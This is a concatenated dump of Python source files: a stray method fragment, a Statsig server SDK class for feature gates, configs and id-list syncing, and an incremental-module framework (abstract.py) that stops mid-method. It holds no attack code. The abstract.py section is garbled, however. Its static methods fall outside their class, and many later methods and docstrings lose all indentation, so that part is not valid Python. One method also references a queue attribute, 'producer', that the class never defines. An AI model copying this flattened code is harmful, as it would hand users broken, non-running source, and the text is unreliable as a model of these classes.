def _teardownSockets(self):
    """Tear down the transport sockets towards the chip. Must be implemented
    by the concrete subclass."""
    raise NotImplementedError()
|
statsig_server.py | import asyncio
import threading
from .evaluator import _ConfigEvaluation, _Evaluator
from .statsig_network import _StatsigNetwork
from .statsig_logger import _StatsigLogger
from .dynamic_config import DynamicConfig
from .statsig_options import StatsigOptions
from .version import __version__
RULESETS_SYNC_INTERVAL = 10
IDLISTS_SYNC_INTERVAL = 60
class StatsigServer:
    """Server-side Statsig SDK entry point for feature gates, dynamic configs
    and experiments.

    Call :meth:`initialize` with a server secret key before using any other
    method; until then the public methods raise RuntimeError.
    """

    # Bug fix: define the flag at class level so that calling any method
    # before initialize() raises the intended RuntimeError instead of an
    # AttributeError on a missing attribute.
    _initialized = False

    def initialize(self, sdkKey: str, options=None):
        """Set up networking, logging, evaluation and background sync threads.

        Args:
            sdkKey: Server secret key ("secret-...") from the Statsig console.
            options (StatsigOptions): Optional SDK options; defaults are
                created when omitted.

        Raises:
            ValueError: If the key is missing or not a server secret key.
        """
        if sdkKey is None or not sdkKey.startswith("secret-"):
            raise ValueError(
                'Invalid key provided. You must use a Server Secret Key from the Statsig console.')
        if options is None:
            options = StatsigOptions()
        self._options = options
        self.__shutdown_event = threading.Event()
        self.__statsig_metadata = {
            "sdkVersion": __version__,
            "sdkType": "py-server"
        }
        self._network = _StatsigNetwork(sdkKey, options)
        self._logger = _StatsigLogger(
            self._network, self.__shutdown_event, self.__statsig_metadata,
            options.local_mode)
        self._evaluator = _Evaluator()
        self._last_update_time = 0

        if not options.local_mode:
            # Fetch once synchronously, then keep rulesets and id lists fresh
            # on daemon background threads.
            self._download_config_specs()
            self.__background_download_configs = threading.Thread(
                target=self._sync,
                args=(self._download_config_specs,
                      options.rulesets_sync_interval or RULESETS_SYNC_INTERVAL,))
            self.__background_download_configs.daemon = True
            self.__background_download_configs.start()

            self._download_id_lists()
            self.__background_download_idlists = threading.Thread(
                target=self._sync,
                args=(self._download_id_lists,
                      options.idlists_sync_interval or IDLISTS_SYNC_INTERVAL,))
            self.__background_download_idlists.daemon = True
            self.__background_download_idlists.start()

        self._initialized = True

    def __ensure_initialized(self):
        # Shared guard for every public entry point.
        if not self._initialized:
            raise RuntimeError(
                'Must call initialize before checking gates/configs/experiments or logging events')

    def __require_user(self, user):
        # Shared user validation for gate/config lookups.
        if not user or not user.user_id:
            raise ValueError(
                'A non-empty StatsigUser.user_id is required. See https://docs.statsig.com/messages/serverRequiredUserID')

    def check_gate(self, user: object, gate_name: str):
        """Evaluate a feature gate for the given user.

        Returns:
            bool: The gate value; False for an empty gate_name.

        Raises:
            RuntimeError: If initialize() has not been called.
            ValueError: If the user has no user_id.
        """
        self.__ensure_initialized()
        self.__require_user(user)
        if not gate_name:
            return False
        result = self.__check_gate_server_fallback(user, gate_name)
        return result.boolean_value

    def get_config(self, user: object, config_name: str):
        """Evaluate a dynamic config for the given user.

        Returns:
            DynamicConfig: The config value; an empty config for an empty name.

        Raises:
            RuntimeError: If initialize() has not been called.
            ValueError: If the user has no user_id.
        """
        self.__ensure_initialized()
        self.__require_user(user)
        if not config_name:
            return DynamicConfig({})
        result = self.__get_config_server_fallback(user, config_name)
        return DynamicConfig(result.json_value, config_name, result.rule_id)

    def get_experiment(self, user: object, experiment_name: str):
        """Evaluate an experiment (backed by the config machinery)."""
        return self.get_config(user, experiment_name)

    def log_event(self, event: object):
        """Enqueue a custom event for logging.

        Raises:
            RuntimeError: If initialize() has not been called.
        """
        self.__ensure_initialized()
        event.user = self.__normalize_user(event.user)
        self._logger.log(event)

    def shutdown(self):
        """Stop background sync threads and flush the logger.

        Safe no-op when initialize() was never called (robustness fix:
        previously raised AttributeError).
        """
        if not self._initialized:
            return
        self.__shutdown_event.set()
        self._logger.shutdown()
        if not self._options.local_mode:
            self.__background_download_configs.join()
            self.__background_download_idlists.join()

    def override_gate(self, gate: str, value: bool, user_id: str = None):
        """Locally override a gate (optionally per user)."""
        self._evaluator.override_gate(gate, value, user_id)

    def override_config(self, config: str, value: object, user_id: str = None):
        """Locally override a config (optionally per user)."""
        self._evaluator.override_config(config, value, user_id)

    def override_experiment(self, experiment: str, value: object, user_id: str = None):
        """Locally override an experiment (optionally per user)."""
        self._evaluator.override_config(experiment, value, user_id)

    def evaluate_all(self, user: object):
        """Evaluate every known gate and config for the user without logging
        exposures.

        Returns:
            dict: {"feature_gates": {...}, "dynamic_configs": {...}}
        """
        all_gates = {}
        for gate in self._evaluator.get_all_gates():
            result = self.__check_gate_server_fallback(user, gate, False)
            all_gates[gate] = {
                "value": result.boolean_value,
                "rule_id": result.rule_id
            }
        all_configs = {}
        for config in self._evaluator.get_all_configs():
            result = self.__get_config_server_fallback(user, config, False)
            all_configs[config] = {
                "value": result.json_value,
                "rule_id": result.rule_id
            }
        return {
            "feature_gates": all_gates,
            "dynamic_configs": all_configs
        }

    def __check_gate_server_fallback(self, user: object, gate_name: str, log_exposure=True):
        # Evaluate locally; fall back to the network when the local ruleset
        # cannot decide (fetch_from_server).
        user = self.__normalize_user(user)
        result = self._evaluator.check_gate(user, gate_name)
        if result.fetch_from_server:
            network_gate = self._network.post_request("check_gate", {
                "gateName": gate_name,
                "user": user.to_dict(True),
                "statsigMetadata": self.__statsig_metadata,
            })
            if network_gate is None:
                return _ConfigEvaluation()
            return _ConfigEvaluation(boolean_value=network_gate.get("value"),
                                     rule_id=network_gate.get("rule_id"))
        elif log_exposure:
            self._logger.log_gate_exposure(
                user, gate_name, result.boolean_value, result.rule_id,
                result.secondary_exposures)
        return result

    def __get_config_server_fallback(self, user: object, config_name: str, log_exposure=True):
        # Evaluate locally; fall back to the network when the local ruleset
        # cannot decide (fetch_from_server).
        user = self.__normalize_user(user)
        result = self._evaluator.get_config(user, config_name)
        if result.fetch_from_server:
            network_config = self._network.post_request("get_config", {
                "configName": config_name,
                # Bug fix: serialize the user the same way the gate fallback
                # does; posting the raw object is not JSON-serializable.
                "user": user.to_dict(True),
                "statsigMetadata": self.__statsig_metadata,
            })
            if network_config is None:
                return _ConfigEvaluation()
            return _ConfigEvaluation(json_value=network_config.get("value", {}),
                                     rule_id=network_config.get("ruleID", ""))
        elif log_exposure:
            self._logger.log_config_exposure(
                user, config_name, result.rule_id, result.secondary_exposures)
        return result

    def __normalize_user(self, user):
        # Attach the configured environment tier to the user, if any.
        if self._options is not None and self._options._environment is not None:
            user._statsig_environment = self._options._environment
        return user

    def _sync(self, sync_func, interval):
        """Run sync_func every `interval` seconds until shutdown is signaled."""
        while True:
            if self.__shutdown_event.wait(interval):
                break
            sync_func()

    def _download_config_specs(self):
        """Fetch ruleset updates newer than the last seen timestamp."""
        specs = self._network.post_request("download_config_specs", {
            "statsigMetadata": self.__statsig_metadata,
            "sinceTime": self._last_update_time,
        })
        if specs is None:
            return
        time = specs.get("time")
        if time is not None:
            self._last_update_time = time
        if specs.get("has_updates", False):
            self._evaluator.setDownloadedConfigs(specs)

    def _download_id_list(self, list_name, list):
        """Fetch incremental add/remove updates for one id list.

        Note: the second parameter shadows the builtin `list`; the name is
        kept for call compatibility.
        """
        res = self._network.post_request("download_id_list", {
            "listName": list_name,
            "statsigMetadata": self.__statsig_metadata,
            "sinceTime": list.get("time", 0),
        })
        if res is None:
            return
        # Bug fix: setdefault stores a freshly created ids dict back into the
        # list entry, so the downloaded ids are not silently discarded.
        ids = list.setdefault("ids", dict())
        for added_id in res.get("add_ids", []):
            ids[added_id] = True
        for removed_id in res.get("remove_ids", []):
            # Bug fix: tolerate removals of ids we never stored (was a
            # bare `del`, which raised KeyError and killed the thread).
            ids.pop(removed_id, None)
        new_time = res.get("time", 0)
        if new_time > list.get("time", 0):
            list["time"] = new_time

    def _download_id_lists(self):
        """Refresh all known id lists concurrently and wait for completion."""
        thread_pool = []
        id_lists = self._evaluator.getIDLists()
        for list_name, entry in id_lists.items():
            thread = threading.Thread(
                target=self._download_id_list, args=(list_name, entry, ))
            thread.daemon = True
            thread_pool.append(thread)
            thread.start()
        for thread in thread_pool:
            thread.join()
|
abstract.py | """
Abstract Module
===============
This module defines the abstract classes used by the incremental modules.
The AbstractModules defines some methods that handle the general tasks of a
module (like the handling of Queues).
The IncrementalQueue defines the basic functionality of an incremental queue
like appending an IU to the queue and letting modules subscribe to the Queue.
The Incremental Unit provides the basic data structure to exchange information
between modules.
"""
import queue
import threading
import time
import enum
import copy
class UpdateType(enum.Enum):
    """The update type enum that defines all the types with which the incremental units
    can be transmitted. Per default, the UpdateMessage class checks that the update type
    is one of the types listed in this enum. However, the strict type checking can be
    disabled and any update type may be used."""

    # A new incremental unit is introduced.
    ADD = "add"
    # An existing incremental unit is modified.
    UPDATE = "update"
    # A previously added incremental unit is retracted.
    REVOKE = "revoke"
    # An incremental unit is finalized and will not change anymore.
    COMMIT = "commit"
class IncrementalQueue(queue.Queue):
    """A queue carrying incremental units between two modules.

    A module may subscribe to a queue of another module. Whenever a new
    incremental unit (IU) is produced, it is put into a dedicated queue for
    every subscriber, so each consumer may process items at its own pace.

    Attributes:
        provider (AbstractModule): The module that provides IUs for this queue.
        consumer (AbstractModule): The module that consumes IUs for this queue.
        maxsize (int): The maximum size of the queue; 0 means unbounded.
    """

    def __init__(self, provider, consumer, maxsize=0):
        """Create a queue connecting a providing and a consuming module.

        Args:
            provider (AbstractModule): Module producing IUs into this queue.
            consumer (AbstractModule): Module reading IUs from this queue.
            maxsize (int): Maximum queue size; 0 for no limit.
        """
        super().__init__(maxsize=maxsize)
        self.consumer = consumer
        self.provider = provider

    def remove(self):
        """Detach this queue from both its provider and its consumer."""
        self.provider.remove_right_buffer(self)
        self.consumer.remove_left_buffer(self)
class IncrementalUnit:
    """An abstract incremental unit.

    The IU may be used for ASR, NLU, DM, TT, TTS, ... It can be redefined to
    fit the needs of different modules (and module types) but should always
    provide these functionalities.

    The meta_data may be used when an incremental module has additional
    information because it is working in a simulated environment. This data
    can be used by later modules to keep the simulation going.

    Attributes:
        creator (AbstractModule): The module that created this IU.
        previous_iu (IncrementalUnit): A link to the IU created before the
            current one.
        grounded_in (IncrementalUnit): A link to the IU this IU is based on.
        created_at (float): The UNIX timestamp of the moment the IU is created.
        meta_data (dict): Optional meta information that is not available for
            all uses of the specific incremental unit.
    """

    MAX_DEPTH = 50
    """Maximum depth of the previous_iu and grounded_in connections."""

    def __init__(
        self,
        creator=None,
        iuid=0,
        previous_iu=None,
        grounded_in=None,
        payload=None,
        **kwargs
    ):
        """Initialize an abstract IU.

        Args:
            creator (AbstractModule): The module that created this incremental
                unit.
            iuid (int): A unique ID assigned by the producing module, used to
                identify the IU later on - for example when revoking it.
            previous_iu (IncrementalUnit): The IU created before this one by
                the same module.
            grounded_in (IncrementalUnit): The IU this one is based on.
            payload: A generic payload that can be set.
        """
        self.creator = creator
        self.iuid = iuid
        self.previous_iu = previous_iu
        self.grounded_in = grounded_in
        self._processed_list = []
        self.payload = payload
        self.mutex = threading.Lock()
        self.committed = False
        self.revoked = False
        # Inherit the meta data of the IU this one is grounded in (shallow copy).
        self.meta_data = {**grounded_in.meta_data} if grounded_in else {}
        self.created_at = time.time()
        self._remove_old_links()

    def _remove_old_links(self):
        # Truncate both ancestor chains so that no more than MAX_DEPTH(+1)
        # links are kept alive and old IUs can be garbage collected.
        for attribute in ("previous_iu", "grounded_in"):
            node = getattr(self, attribute)
            depth = 0
            while node:
                if depth == self.MAX_DEPTH:
                    setattr(node, attribute, None)
                node = getattr(node, attribute)
                depth += 1

    def age(self):
        """Return the age of the IU in seconds.

        Returns:
            float: The age of the IU in seconds.
        """
        return time.time() - self.created_at

    def older_than(self, s):
        """Return whether the IU is older than s seconds.

        Args:
            s (float): The time in seconds to check against.

        Returns:
            bool: Whether or not the age of the IU exceeds s seconds.
        """
        return self.age() > s

    def processed_list(self):
        """Return a copy of the list of modules that already processed this IU.

        Returns:
            list: A list of all modules that have already processed this IU.
        """
        with self.mutex:
            return list(self._processed_list)

    def set_processed(self, module):
        """Record that the given module has processed this IU.

        Args:
            module (AbstractModule): The module that has processed this IU.

        Raises:
            TypeError: If the given object is not an AbstractModule.
        """
        if not isinstance(module, AbstractModule):
            raise TypeError("Given object is not a module!")
        with self.mutex:
            self._processed_list.append(module)

    def is_processed_by(self, module):
        """Return True if the IU has been processed by the given module.

        Args:
            module (AbstractModule): The module to test.

        Returns:
            bool: Whether or not the module has processed the IU.
        """
        with self.mutex:
            return module in self._processed_list

    def __repr__(self):
        return "%s - (%s): %s" % (
            self.type(),
            self.creator.name(),
            str(self.payload)[0:10],
        )

    @staticmethod
    def type():
        """Return the type of the IU in a human-readable format.

        Returns:
            str: The type of the IU in a human-readable format.
        """
        raise NotImplementedError()
class UpdateMessage:
    """A class that encapsulates multiple incremental units and their update
    types. The update types can be any of the ones defined in the enum
    UpdateType.

    Iterating over an UpdateMessage yields (IncrementalUnit, UpdateType)
    tuples. Note that the iteration state lives on the message itself, so only
    one iteration should be active at a time.
    """

    def __init__(self):
        """Initializes the update message with no IU added.

        To initialize with a single IU use the classmethod "from_iu" or for a
        list of IUs use the classmethod "from_iu_list".
        """
        self._msgs = []  # First element of tuple is IU, second is UpdateType
        self._counter = -1  # iteration cursor used by __next__

    def __len__(self):
        return len(self._msgs)

    @classmethod
    def from_iu(cls, iu, update_type):
        """Initializes the update message with an initial pair of incremental
        unit and update type.

        Args:
            iu (IncrementalUnit): The first incremental unit of the update message.
            update_type (UpdateType): The update type of the incremental unit.

        Returns:
            UpdateMessage: The newly created update message.
        """
        um = cls()
        um.add_iu(iu, update_type)
        return um

    @classmethod
    def from_iu_list(cls, iu_list):
        """Initializes the update message with a list of tuples containing
        update types and incremental units in the format
        (UpdateType, IncrementalUnit) — the order expected by add_ius.

        Bug fix: the signature previously carried a stray ``self`` parameter
        in addition to ``cls``, which made the documented call
        ``UpdateMessage.from_iu_list(iu_list)`` raise a TypeError.

        Args:
            iu_list (list): A list of (UpdateType, IncrementalUnit) tuples
                that will be added to the update message.

        Returns:
            UpdateMessage: The newly created update message.
        """
        um = cls()
        um.add_ius(iu_list)
        return um

    def __iter__(self):
        return self

    def __next__(self):
        # The cursor resets to -1 on exhaustion so the message can be
        # iterated again afterwards.
        self._counter += 1
        if self._counter == len(self._msgs):
            self._counter = -1
            raise StopIteration
        return self._msgs[self._counter]

    def add_iu(self, iu, update_type, strict_update_type=True):
        """Adds an incremental unit to the update message with the given
        update type.

        Args:
            iu (IncrementalUnit): The incremental unit to be added.
            update_type (UpdateType): The update type to associate with the
                incremental unit.
            strict_update_type (bool): Whether the update type should be
                checked and converted to type UpdateType.

        Raises:
            TypeError: When the given incremental unit is not of type
                IncrementalUnit.
            ValueError: When strict checking is on and the given update type
                cannot be converted to an UpdateType.
        """
        if not isinstance(iu, IncrementalUnit):
            raise TypeError("IU is of type %s but should be IncrementalUnit" % type(iu))
        if strict_update_type and not isinstance(update_type, UpdateType):
            update_type = UpdateType(update_type)
        self._msgs.append((iu, update_type))

    def add_ius(self, iu_list, strict_update_type=True):
        """Adds a list of incremental units and according update types to the
        update message.

        If a single tuple raises a TypeError or a ValueError, none of the
        units are added to the update message (validate-then-add).

        Args:
            iu_list (list): A list of (UpdateType, IncrementalUnit) tuples.
            strict_update_type (bool): Whether the update type should be
                checked and converted to type UpdateType.

        Raises:
            TypeError: When a given incremental unit is not of type
                IncrementalUnit.
            ValueError: When strict checking is on and a given update type
                cannot be converted to an UpdateType.
        """
        # First pass: validate everything so a bad tuple adds nothing.
        for update_type, iu in iu_list:
            if not isinstance(iu, IncrementalUnit):
                raise TypeError(
                    "IU is of type %s but should be IncrementalUnit" % type(iu)
                )
            if strict_update_type and not isinstance(update_type, UpdateType):
                UpdateType(update_type)  # raises ValueError on invalid input
        # Second pass: convert and append.
        for update_type, iu in iu_list:
            if strict_update_type and not isinstance(update_type, UpdateType):
                update_type = UpdateType(update_type)
            self._msgs.append((iu, update_type))

    def has_valid_ius(self, iu_classes):
        """Checks whether the IUs in this update message are all instances of
        the given class(es).

        Args:
            iu_classes (list or class): A list of incremental unit classes or
                a single incremental unit class to check against.

        Returns:
            bool: True if all incremental units in the update message are
                instances of the given iu_classes; False when iu_classes is
                None or any IU does not match.
        """
        if iu_classes is None:
            return False
        if not isinstance(iu_classes, list):
            iu_classes = [iu_classes]
        for iu in self.incremental_units():
            if not isinstance(iu, tuple(iu_classes)):
                return False
        return True

    def update_types(self):
        """A generator over all update types of the update message, ignoring
        the incremental units."""
        for _, ut in self._msgs:
            yield ut

    def incremental_units(self):
        """A generator over all incremental units of the update message,
        ignoring the update types."""
        for iu, _ in self._msgs:
            yield iu

    def set_processed(self, module):
        """Sets all the incremental units of the update message as processed
        by the given module.

        Args:
            module (AbstractModule): The module that has processed the
                incremental units of this update message.
        """
        for iu in self.incremental_units():
            iu.set_processed(module)
class AbstractModule:
    """An abstract module that is able to incrementally process data."""

    # Event names dispatched through the module's event mechanism.
    EVENT_PROCESS_IU = "process_iu"
    EVENT_PROCESS_UPDATE_MESSAGE = "process_update_message"
    EVENT_SUBSCRIBE = "subscribe"
    EVENT_START = "start"
    EVENT_STOP = "stop"

    QUEUE_TIMEOUT = 0.01
    """Timeout in seconds for the incremental queues as not to block processing."""
@staticmethod
def name():
    """Return the human-readable name of the module.

    Returns:
        str: A string containing the name of the module

    Raises:
        NotImplementedError: Always; concrete modules must override this.
    """
    raise NotImplementedError()
@staticmethod
def description():
    """Return the human-readable description of the module.

    Returns:
        str: A string containing the description of the module

    Raises:
        NotImplementedError: Always; concrete modules must override this.
    """
    raise NotImplementedError()
@staticmethod
def input_ius():
    """Return the list of IU classes that may be processed by this module.

    If an IU is passed to the module that is not in this list or a subclass
    of this list, an error is thrown when trying to process that IU.

    Returns:
        list: A list of classes that this module is able to process.

    Raises:
        NotImplementedError: Always; concrete modules must override this.
    """
    raise NotImplementedError()
@staticmethod
def output_iu():
    """Return the class of IU that this module is producing.

    Returns:
        class: The class of IU this module is producing.

    Raises:
        NotImplementedError: Always; concrete modules must override this.
    """
    raise NotImplementedError()
def get_init_arguments(self):
"""Returns the arguments of the init function to create the current
instance of the Module.
Returns:
dict: A dictionary containing all the necessary arguments to create
the current instance of the module.
"""
d = {}
valid_types = (int, float, bool, str, dict) # Only serializable types.
for k, v in self.__dict__.items():
if isinstance(v, valid_types):
d[k] = v
return d
def __init__(self, queue_class=IncrementalQueue, meta_data={}, **kwargs):
"""Initialize the module with a default IncrementalQueue.
Args:
queue_class (IncrementalQueue): A queue class that should be used
instead of the standard queue class. If the given object does
not inherit from IncrementalQueue, the standard IncrementalQueue
is used.
meta_data (dict): A dict with meta data about the module. This may
be coordinates of the visualization of this module or other
auxiliary information.
"""
self._right_buffers = []
self.is_running = False
self._previous_iu = None
self._left_buffers = []
self.mutex = threading.Lock()
self.events = {}
self.current_ius = []
self.meta_data = {}
if meta_data:
self.meta_data = meta_data
self.queue_class = IncrementalQueue
if issubclass(queue_class, IncrementalQueue):
self.queue_class = queue_class
self.iu_counter = 0
def revoke(self, iu, remove_revoked=True):
"""Revokes an IU form the list of the current_ius.
Args:
iu (IncrmentalUnit or list): The incremental unit or a list of incremental
units to revoke.
remove_revoked (bool): Whether the revoked incremental unit should be
deleted from the current_ius list or if only the revoked flag should
be set.
"""
if isinstance(iu, IncrementalUnit):
iu = [iu]
new_iu_list = []
for ciu in self.current_ius:
flag = False
for a in iu:
if ciu.iuid == a.iuid:
ciu.revoked = True
flag = True
break
if not flag:
new_iu_list.append(ciu)
if remove_revoked:
self.current_ius = new_iu_list
def commit(self, iu):
"""Sets one or multiple IUs as commited from the list of the current_ius.
Args:
iu (IncrementalUnit or list): The incrementall unit or list of incremental
to set as committed.
"""
if isinstance(iu, IncrementalUnit):
iu = [iu]
for ciu in self.current_ius:
for i in iu:
if ciu.iuid == i.iuid:
ciu.committed = True
break
def add_left_buffer(self, left_buffer):
"""Add a new left buffer for the module.
This method stops the execution of the module pipeline if it is running.
Args:
left_buffer (IncrementalQueue): The left buffer to add to the
module.
"""
if not left_buffer or not isinstance(left_buffer, IncrementalQueue):
return
if self.is_running:
self.stop()
self._left_buffers.append(left_buffer)
def remove_left_buffer(self, left_buffer):
"""Remove a left buffer from the module.
This method stops the execution of the module pipeline if it is running.
Args:
left_buffer (IncrementalQueue): The left buffer to remove from the
module.
"""
if self.is_running:
self.stop()
self._left_buffers.remove(left_buffer)
def left_buffers(self):
"""Returns the list of left buffers of the module.
Returns:
list: The left buffers of the module.
"""
return list(self._left_buffers)
def add_right_buffer(self, right_buffer):
"""Add a new right buffer for the module.
This method stops the execution of the module pipeline if it is running.
Args:
right_buffer (IncrementalQueue): The right buffer to add to the
module.
"""
if not right_buffer or not isinstance(right_buffer, IncrementalQueue):
return
if self.is_running:
self.stop()
self._right_buffers.append(right_buffer)
def remove_right_buffer(self, right_buffer):
"""Remove a right buffer from the module.
This method stops the execution of the module pipeline if it is running.
Args:
right_buffer (IncrementalQueue): The right buffer to remove from the
module.
"""
if self.is_running:
self.stop()
self._right_buffers.remove(right_buffer)
def right_buffers(self):
"""Return the right buffers of the module.
Note that the returned list is only a shallow copy. Modifying the list
does not alter the internal state of the module (but modifying the
queues in that list does).
Returns:
list: A list of the right buffers, each queue corresponding to an
input of another module.
"""
return list(self._right_buffers)
def append(self, update_message):
"""Append an update message to all queues.
If update_message is None or there are no IUs in the update message, the method
returns without doing anything.
Args:
update_message (UpdateMessage): The update message that should be added to
all output queues. May be None.
"""
if not update_message:
return
if not isinstance(update_message, UpdateMessage):
raise TypeError(
"Update message is of type %s but should be UpdateMessage"
% type(update_message)
)
for q in self._right_buffers:
q.put(copy.copy(update_message))
def subscribe(self, module, q=None):
"""Subscribe a module to the queue.
It returns a queue where the IUs for that module are placed. The queue
is not shared with other modules. By default this method creates a new
queue, but it may use an alternative queue given in parameter 'q'.
Args:
module (AbstractModule): The module that wants to subscribe to the
output of the module.
q (IncrementalQueue): A optional queue that is used. If q is None,
the a new queue will be used"""
if not q:
self.event_call(self.EVENT_SUBSCRIBE, {"module": module})
q = self.queue_class(self, module)
module.add_left_buffer(q)
self._right_buffers.append(q)
return q
def remove_from_rb(self, module):
"""Removes the connection to a module from the right buffers.
This method removes all queues between this module and the given module
from the right buffer of this module and the left buffer of the given
module.
This method stops the execution of the module.
Args:
module: A module that is subscribed to this module
"""
if self.is_running:
self.stop()
# We get a copy of the buffers because we are mutating it
rbs = self.right_buffers()
for buffer in rbs:
if buffer.consumer == module:
buffer.remove()
def remove_from_lb(self, module):
"""Removes the connection to a module from the left buffers.
This method removes all queues between this module and the given module
from the left buffer of this module and the right buffer of the given
module.
This method stops the execution of the module.
Args:
module: A module that this module is subscribed to
"""
if self.is_running:
self.stop()
# We get a copy of the buffers because we are mutating it
lbs = self.left_buffers()
for buffer in lbs:
if buffer.producer == module:
buffer.remove()
def remove(self):
"""Removes all connections to all modules.
This methods removes all queues from the left buffer and right buffer.
The queues are also removed from the buffers of the connected modules.
This method can be used to remove a module completely from a network.
This method stops the execution of the module.
"""
if self.is_running:
self.stop()
lbs = self.left_buffers()
rbs = self.right_buffers()
for buffer in lbs:
buffer.remove()
for buffer in rbs:
buffer.remove()
def process_update(self, update_message):
"""Processes the update message given and returns a new update message that can
be appended to the output queues.
Note that the incremental units in the update message that is returned should be
created by the create_iu method so that they have correct references to the
previous incremental units generated by this module and the IUs that they are
based on.
It is important that the process_update method processes the update messages
in a timely manner (in regards to the production of update messages from the
preceding module) so that the incremental queues do not overflow.
Args:
update_message (UpdateMEssage): The update message that should be processed
by the module.
Returns:
UpdateMessage: An update message that is produced by this module based
on the incremental units that were given. May be None.
"""
raise NotImplementedError()
def _run(self):
self.prepare_run()
self.is_running = True
while self.is_running:
for buffer in self._left_buffers:
with self.mutex:
try:
update_message = buffer.get(timeout=self.QUEUE_TIMEOUT)
except queue.Empty:
update_message = None
if update_message:
if not update_message.has_valid_ius(self.input_ius()):
raise TypeError("This module can't handle this type of IU")
output_message = self.process_update(update_message)
update_message.set_processed(self)
for input_iu in update_message.incremental_units():
self.event_call(self.EVENT_PROCESS_IU, {"iu": input_iu})
self.event_call(
self.EVENT_PROCESS_UPDATE_MESSAGE,
{"update_message": update_message},
)
if output_message:
if output_message.has_valid_ius(self.output_iu()):
self.append(output_message)
else:
raise TypeError(
"This module should not produce IUs of this type."
)
self.shutdown()
def is_valid_input_iu(self, iu):
"""Return whether the given IU is a valid input IU.
Valid is defined by the list given by the input_ius function. The given
IU must be one of the types defined in that list or be a subclass of it.
Args:
iu (IncrementalUnit): The IU to be checked.
Raises:
TypeError: When the given object is not of type IncrementalUnit.
Returns:
bool: Whether the given iu is a valid one for this module.
"""
if not isinstance(iu, IncrementalUnit):
raise TypeError("IU is of type %s but should be IncrementalUnit" % type(iu))
for valid_iu in self.input_ius():
if isinstance(iu, valid_iu):
return True
return False
def setup(self):
"""This method is called before the module is run. This method can be
used to set up the pipeline needed for processing the IUs.
However, after the setup method is called, the module may not
immediately be run. For code that should be executed immediately before
a module is run use the `prepare_run` method.
"""
pass
def prepare_run(self):
"""A method that is executed just before the module is being run.
While this method may seem similar to `setup`, it is called immediately
before the run routine. This method may be used in producing modules to
initialize the generation of output IUs. Other than the `setup` method,
this method makes sure that other modules in the network are also
already setup.
"""
pass
def shutdown(self):
"""This method is called before the module is stopped. This method can
be used to tear down the pipeline needed for processing the IUs."""
pass
def run(self, run_setup=True):
"""Run the processing pipeline of this module in a new thread. The
thread can be stopped by calling the stop() method.
Args:
run_setup (bool): Whether or not the setup method should be executed
before the thread is started.
"""
if run_setup:
self.setup()
for q in self.right_buffers():
with q.mutex:
q.queue.clear()
t = threading.Thread(target=self._run)
t.start()
self.event_call(self.EVENT_START)
def stop(self, clear_buffer=True):
"""Stops the execution of the processing pipeline of this module at the
next possible point in time. This may be after the next incoming IU is
processed."""
self.is_running = False
if clear_buffer:
for buffer in self.right_buffers():
while not buffer.empty():
buffer.get()
self.event_call(self.EVENT_STOP)
def create_iu(self, grounded_in=None):
"""Creates a new Incremental Unit that contains the information of the
creator (the current module), the previous IU that was created in this
module and the iu that it is based on.
Do not discard (as in not using) any IU that was created by this method,
because it will alreade have been introduced into the chain of IUs of
this module!
Args:
grounded_in (IncrementalUnit): The incremental unit that the new
unit is based on. May be None.
Returns:
IncrementalUnit: A new incremental unit with correct pointer to
unit it is grounded in and to the previous IU that was generated by
this module.
"""
new_iu = self.output_iu()(
creator=self,
iuid=self.iu_counter,
previous_iu=self._previous_iu,
grounded_in=grounded_in,
)
self.iu_counter += 1
self._previous_iu = new_iu
return new_iu
def latest_iu(self):
"""Provides reading access to the latest incremental unit that was
produced by this module.
Thus, the information received by this method might be out of date or
completely wrong (in case where a not yet initialized IU is returned).
The iu returned should not be modified in any way, because it could
still be processed by a module.
Return:
(IncrementalUnit): The latest IU that was produced by the module.
"""
return self._previous_iu
def __repr__(self):
return self.name()
def event_subscribe(self, event_name, callback):
"""
Subscribe a callback to an event with the given name. If tge event name
is "*", then the callback will be called after every event.
The callback function is given three arguments: the module that
triggered the event (AbstractModule), the name of the event (str) and a
dict (dict) that may contain data relevant to the event.
Args:
event_name (str): The name of the event to subscribe to
callback (function): A function that is called once the event occurs
"""
if not self.events.get(event_name):
self.events[event_name] = []
self.events[event_name].append(callback)
def event_call(self, event_name, data={}):
"""
Calls all callback functions that are subscribed to the given event
name with some data attached to it. The data is optional but should stay
consistent with each call of the same event.
If * is passed as the event name, no callback function is called.
Event name should be a unique identifier to the event. "*" is not
allowed as an event name.
Args:
event_name (str): The name of the event (not "*")
data (dict): Optionally some data that is relevant to the event.
"""
if data is None:
data = {}
if event_name == "*":
return
if self.events.get(event_name):
for callback in self.events[event_name]:
threading.Thread(target=callback, args=(self, event_name, data)).start()
if self.events.get("*"):
for callback in self.events["*"]:
threading.Thread(target=callback, args=(self, event_name, data)).start()
class AbstractProducingModule(AbstractModule):
    """An abstract producing module that is able to incrementally process data.

    The producing module has no input queue and thus does not wait for any
    input. The producing module is called continuously and may return new output
    when it becomes available.
    """

    @staticmethod
    def name():
        raise NotImplementedError()

    @staticmethod
    def description():
        raise NotImplementedError()

    @staticmethod
    def input_ius():
        # A producer consumes nothing.
        return []

    @staticmethod
    def output_iu():
        raise NotImplementedError()

    def __init__(self, queue_class=IncrementalQueue, **kwargs):
        # Bug fix: the caller's queue_class was previously discarded
        # (IncrementalQueue was always passed up); forward it instead.
        super().__init__(queue_class=queue_class, **kwargs)

    def _run(self):
        # Producer loop: poll process_update(None) continuously; stop() clears
        # is_running to end the loop.
        self.prepare_run()
        self.is_running = True
        while self.is_running:
            with self.mutex:
                output_message = self.process_update(None)
                if output_message:
                    if output_message.has_valid_ius(self.output_iu()):
                        self.append(output_message)
                    else:
                        raise TypeError(
                            "This module should not produce IUs of this type."
                        )
        self.shutdown()

    def process_update(self, update_message):
        raise NotImplementedError()
class AbstractConsumingModule(AbstractModule):
    """An abstract consuming module that is able to incrementally process data.

    The consuming module consumes IUs but does not return any data.
    """

    @staticmethod
    def name():
        raise NotImplementedError()

    @staticmethod
    def description():
        raise NotImplementedError()

    @staticmethod
    def input_ius():
        raise NotImplementedError()

    @staticmethod
    def output_iu():
        # Consumers produce nothing, so there is no output IU class.
        return None

    def subscribe(self, module, q=None):
        # A consumer is a sink in the network; attaching a subscriber to it is
        # a usage error, so fail loudly instead of returning a queue.
        raise ValueError("Consuming Modules do not produce any output")

    def process_update(self, update_message):
        raise NotImplementedError()
class AbstractTriggerModule(AbstractProducingModule):
    """An abstract trigger module that produces an update message once a trigger method
    is called. Unless the module is triggered no updates are produced"""

    @staticmethod
    def name():
        raise NotImplementedError()

    @staticmethod
    def description():
        raise NotImplementedError()

    @staticmethod
    def input_ius():
        return []

    @staticmethod
    def output_iu():
